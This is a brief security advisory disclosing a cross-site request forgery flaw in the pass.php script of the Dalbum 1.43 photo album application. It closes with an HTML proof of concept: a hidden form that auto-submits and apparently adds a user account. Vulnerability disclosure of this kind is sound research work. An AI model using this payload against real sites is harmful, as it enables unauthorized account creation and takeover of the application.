Vulnerability ID: HTB22941 Reference: http://www.htbridge.ch/advisory/csrf_cross_site_request_forgery_in_dalbum.html Product: Dalbum Vendor: http://www.dalbum.org/ ( http://www.dalbum.org/ ) Vulnerable Version: 1.43 Vendor Notification: 05 April 2011 Vulnerability Type: CSRF (Cross-Site Request Forgery) Risk level: Low Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) Vulnerability Details: The vulnerability exists due to failure in the "pass.php" script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: [html] <form action="http://[host]/pass.php"; method="post" name="main" /> <input name="user" value="1" type="hidden" /> <input name="pass" value="1" type="hidden" /> <input name="passc" value="1" type="hidden" /> <input type="hidden" name="action" value="add"> <input type="submit" id="btn" name="submit" value="Submit ââ"> </form> <script> document.getElementById('btn').click(); </script> [/html]
